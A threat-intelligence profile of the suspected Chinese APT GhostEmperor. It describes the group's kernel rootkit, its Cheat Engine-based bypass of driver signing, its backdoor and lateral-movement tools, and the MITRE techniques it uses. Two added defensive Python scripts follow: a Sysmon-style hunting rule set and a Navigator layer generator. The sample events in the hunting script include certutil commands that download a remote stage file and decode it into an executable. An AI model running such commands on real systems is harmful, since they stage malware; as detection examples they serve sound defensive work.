| GhostEmperor | |
| --- | --- |
| Location | China |
| Date of Initial Activity | 2020 |
| Suspected Attribution | APT |
| Motivation | Cyberwarfare |
| Software | Windows |
Overview
GhostEmperor, an advanced persistent threat (APT) group believed to originate from China, is known for sophisticated cyber espionage against governmental and telecommunications organizations across Southeast Asia. First identified in 2020, the actor focuses on information theft and invests heavily in stealth and concealment. It stands out for its use of a previously unknown Windows kernel-mode rootkit, which gives the group remote control over compromised systems while evading detection by traditional security measures.
GhostEmperor’s operations are characterized by their complexity and precision. The group uses a distinctive loading scheme built on components of the open-source project “Cheat Engine” to bypass Windows Driver Signature Enforcement (DSE), which lets it load its kernel-mode code without the signing checks that would normally block it and reflects a level of technical proficiency that sets it apart from other threat actors. Its toolkit also includes tools such as Demodex and PsExec, used for reconnaissance, lateral movement, and data exfiltration within targeted networks.
Common Targets
- Public Administration
- Information
- Afghanistan
- Egypt
- Ethiopia
- Indonesia
- Malaysia
- Thailand
- Vietnam
Attack vectors
Software Vulnerabilities
How they work
One of the most distinctive aspects of GhostEmperor’s operations is its previously unknown Windows kernel-mode rootkit, which gives the group remote control over targeted servers with a high degree of stealth. Because rootkits run at a low level in the operating system, they let threat actors hide their presence from security solutions. The rootkit’s loading mechanism circumvents Windows Driver Signature Enforcement by using components from the open-source project “Cheat Engine,” which points to both the group’s technical expertise and its careful selection of tools that enhance operational effectiveness.
After gaining initial access to a target system, GhostEmperor uses several techniques to establish persistence and maintain control. The group has been observed using the Pantegana backdoor, an open-source remote access tool. Embedding such tools in the compromised environment lets it execute commands, gather intelligence, and move laterally across the network. Legitimate utilities such as certutil and PsExec further let it execute scripts and commands remotely, solidifying its foothold within the target infrastructure.
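The loader and living-off-the-land behaviour described in the two paragraphs above leaves traces in ordinary Windows telemetry. The following Python script is an added example, not code from the page or any vendor: it applies three hunting rules to constructed Sysmon-style events. It flags driver loads that are unsigned, come from an unusual path, or match a watchlist of legitimately signed but abusable drivers (the entry dbk64.sys is assumed to be Cheat Engine’s kernel component; extend the list from whatever vulnerable-driver blocklist you maintain), certutil invocations used for download or decoding, and installation of the PsExec service. Event field names are simplified from Sysmon Events 1 and 6 and the System log’s Event 7045.

```python
"""Host-side hunting rules for the loader and living-off-the-land tradecraft
described above, run over constructed Windows/Sysmon-style events."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str   # ATT&CK technique ID
    reason: str


# Constructed sample events (not real telemetry). Fields are simplified from
# Sysmon Event 1 (process create), Sysmon Event 6 (driver load) and the
# System log's Event 7045 (service installed).
SAMPLE_EVENTS = [
    {"id": 1, "host": "srv01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/stage.txt C:\Users\Public\s.txt"},
    {"id": 1, "host": "srv01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Users\Public\s.txt C:\Users\Public\s.exe"},
    {"id": 1, "host": "srv01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -verify C:\certs\root.cer"},          # benign admin use
    {"id": 6, "host": "srv01", "image": r"C:\Users\Public\dbk64.sys", "signed": "true"},
    {"id": 6, "host": "srv01", "image": r"C:\Windows\System32\drivers\ndis.sys", "signed": "true"},
    {"id": 7045, "host": "srv02", "service": "PSEXESVC", "image": r"C:\Windows\PSEXESVC.exe"},
    {"id": 7045, "host": "srv02", "service": "Spooler", "image": r"C:\Windows\System32\spoolsv.exe"},
]

# Watchlist of driver file names that carry a valid signature but expose kernel
# read/write primitives. Assumption: dbk64.sys/dbk32.sys are the Cheat Engine
# kernel component; extend this from the vulnerable-driver blocklist you use.
ABUSABLE_DRIVERS = {"dbk64.sys", "dbk32.sys"}
DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\", "c:\\windows\\system32\\driverstore\\")

CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b", re.I)
CERTUTIL_DECODE = re.compile(r"-(de|en)code\b", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """certutil abused as a downloader or base64 decoder (T1105 / T1140)."""
    if basename(ev["image"]) != "certutil.exe":
        return None
    cmd = ev["cmdline"]
    if CERTUTIL_DOWNLOAD.search(cmd):
        return Finding(ev["host"], "T1105", "certutil used to fetch a remote file: " + cmd)
    if CERTUTIL_DECODE.search(cmd):
        return Finding(ev["host"], "T1140", "certutil used to decode/encode a payload: " + cmd)
    return None


def check_driver(ev):
    """Driver load that is watchlisted, unsigned, or outside the driver directories (T1014)."""
    name = basename(ev["image"])
    if name in ABUSABLE_DRIVERS:
        return Finding(ev["host"], "T1014", f"known-abusable signed driver loaded: {name}")
    if ev.get("signed", "false").lower() != "true":
        return Finding(ev["host"], "T1014", f"unsigned driver loaded: {ev['image']}")
    if not ev["image"].lower().startswith(DRIVER_DIRS):
        return Finding(ev["host"], "T1014", f"driver loaded from unusual path: {ev['image']}")
    return None


def check_service(ev):
    """PsExec drops and installs its PSEXESVC service on the remote host (T1021)."""
    if ev["service"].upper() == "PSEXESVC" or basename(ev["image"]) == "psexesvc.exe":
        return Finding(ev["host"], "T1021", f"PsExec service installed: {ev['image']}")
    return None


CHECKS = {1: check_process, 6: check_driver, 7045: check_service}


def hunt(events):
    """Run every applicable rule and return the findings in event order."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev["id"])
        if check:
            finding = check(ev)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host}: {f.technique} - {f.reason}")
```

The watchlist rule fires before the signature check on purpose: a DSE bypass of this kind relies on the driver being validly signed, so "signed" alone is not a clean signal. Run over the sample set, the script reports four findings and leaves the benign certutil, ndis.sys and Spooler events alone.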
Once entrenched within a network, GhostEmperor meticulously conducts reconnaissance to gather information about the system and its configurations. This involves utilizing techniques such as System Information Discovery and Network Service Scanning to identify potential vulnerabilities and valuable assets. By mapping the environment, the group can prioritize targets for further exploitation, ultimately enhancing their operational efficiency. This phase is crucial, as it informs their subsequent actions, whether they be data collection or lateral movement to other high-value targets within the network.
GhostEmperor’s exfiltration strategies are equally advanced. They often utilize Exfiltration Over Command and Control Channel, allowing them to transfer stolen data stealthily without raising alarms. The group’s focus on maintaining a low profile while conducting operations highlights their awareness of modern cybersecurity defenses and the importance of minimizing detection risks. Their reliance on both custom tools and publicly available exploits underscores a hybrid approach to cyber operations, wherein they can adapt to varying target environments and security postures.
In conclusion, GhostEmperor represents a formidable threat in the landscape of cyber espionage. Their technical operations reflect a deep understanding of both system vulnerabilities and operational security, allowing them to execute complex campaigns against high-profile targets with minimal detection. As organizations continue to strengthen their cybersecurity measures, the adaptability and sophistication of threat actors like GhostEmperor pose ongoing challenges, necessitating continuous vigilance and innovative defense strategies in the face of evolving cyber threats.
MITRE Tactics and Techniques
Initial Access (TA0001):
- Exploit Public-Facing Application (T1190): GhostEmperor may leverage vulnerabilities in public-facing applications to gain initial access.
Execution (TA0002):
- Command and Scripting Interpreter (T1059): Utilizes scripts or command-line tools to execute malicious commands.
Persistence (TA0003):
- Boot or Logon Autostart Execution (T1547): The rootkit can establish persistence by manipulating system startup processes.
Privilege Escalation (TA0004):
- Exploitation for Privilege Escalation (T1068): Gains elevated privileges through exploiting vulnerabilities within the operating system.
Defense Evasion (TA0005):
- Obfuscated Files or Information (T1027): GhostEmperor uses obfuscation techniques to hide malicious code.
- Rootkit (T1014): Deploys a kernel-mode rootkit that is difficult to detect and analyze.
Credential Access (TA0006):
- Credential Dumping (T1003): Harvests credentials from the system to facilitate lateral movement.
Discovery (TA0007):
- System Information Discovery (T1082): Gathers information about the system and network configurations.
- Network Service Scanning (T1046): Scans the network for services to identify potential targets for further exploitation.
Lateral Movement (TA0008):
- Remote Services (T1021): Uses remote services such as PsExec for lateral movement within the network.
Collection (TA0009):
- Data from Information Repositories (T1213): Collects sensitive information from compromised systems.
Exfiltration (TA0010):
- Exfiltration Over Command and Control Channel (T1041): Transfers stolen data over established command and control channels.
Impact (TA0040):
- Data Manipulation (T1565): Potentially alters data to achieve the group’s objectives, though this is more common in disruptive operations.
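A tactic/technique listing in the form above is most useful once it is overlaid on your own detection coverage, which is what ATT&CK Navigator layers are for. The Python script below is an added example, not from the page or from MITRE: it parses lines in this listing’s format (a tactic line ending in “(TAxxxx):” followed by technique lines “Name (Txxxx): description”) and emits a Navigator layer JSON document. The embedded input is a constructed excerpt of the listing, and the `attack`, `navigator` and `layer` version strings are assumptions to be checked against the Navigator release you run.

```python
"""Turn a tactic/technique listing like the one above into an ATT&CK Navigator
layer so the profile can be overlaid on detection coverage."""
import json
import re

# Constructed excerpt in the listing's format: a tactic line "Name (TAxxxx):"
# followed by technique lines "Name (Txxxx): description".
PROFILE_TEXT = """\
Initial Access (TA0001):
Exploit Public-Facing Application (T1190): GhostEmperor may leverage vulnerabilities in public-facing applications to gain initial access.
Defense Evasion (TA0005):
Obfuscated Files or Information (T1027): GhostEmperor uses obfuscation techniques to hide malicious code.
Rootkit (T1014): Deploys a kernel-mode rootkit that is difficult to detect and analyze.
Lateral Movement (TA0008):
Remote Services (T1021): Uses remote services such as PsExec for lateral movement within the network.
"""

# An optional leading "- " lets the same parser accept a bulleted listing.
TACTIC_RE = re.compile(r"^\s*-?\s*(?P<name>[^()]+?)\s*\((?P<id>TA\d{4})\):\s*$")
TECH_RE = re.compile(r"^\s*-?\s*(?P<name>[^()]+?)\s*\((?P<id>T\d{4}(?:\.\d{3})?)\):\s*(?P<desc>.*)$")


def tactic_shortname(name: str) -> str:
    """Navigator keys tactics by their lower-case, hyphenated name."""
    return name.strip().lower().replace(" ", "-")


def parse_profile(text: str):
    """Return one entry per technique line, tagged with the tactic it sits under.
    Technique lines that appear before any tactic heading are dropped."""
    entries, tactic = [], None
    for line in text.splitlines():
        m = TACTIC_RE.match(line)
        if m:
            tactic = tactic_shortname(m["name"])
            continue
        m = TECH_RE.match(line)
        if m and tactic:
            entries.append({"techniqueID": m["id"], "tactic": tactic,
                            "name": m["name"].strip(), "comment": m["desc"].strip()})
    return entries


def build_layer(actor: str, entries):
    """Navigator v4 layer document. The version numbers are assumptions; check
    them against the Navigator instance you load the file into."""
    return {
        "name": f"{actor} techniques",
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": f"Techniques attributed to {actor} in the profile above",
        "techniques": [
            {"techniqueID": e["techniqueID"], "tactic": e["tactic"], "score": 1,
             "color": "#e60d0d", "comment": e["comment"], "enabled": True}
            for e in entries
        ],
        "gradient": {"colors": ["#ffffff", "#e60d0d"], "minValue": 0, "maxValue": 1},
    }


if __name__ == "__main__":
    print(json.dumps(build_layer("GhostEmperor", parse_profile(PROFILE_TEXT)), indent=2))
```

Each technique is keyed to the tactic heading it appears under, so a technique that the profile lists under two tactics produces two layer entries, which is how Navigator expects them. Giving every entry a score of 1 lets you load this layer next to a coverage layer scored by detection maturity and compare the two with the built-in layer operations.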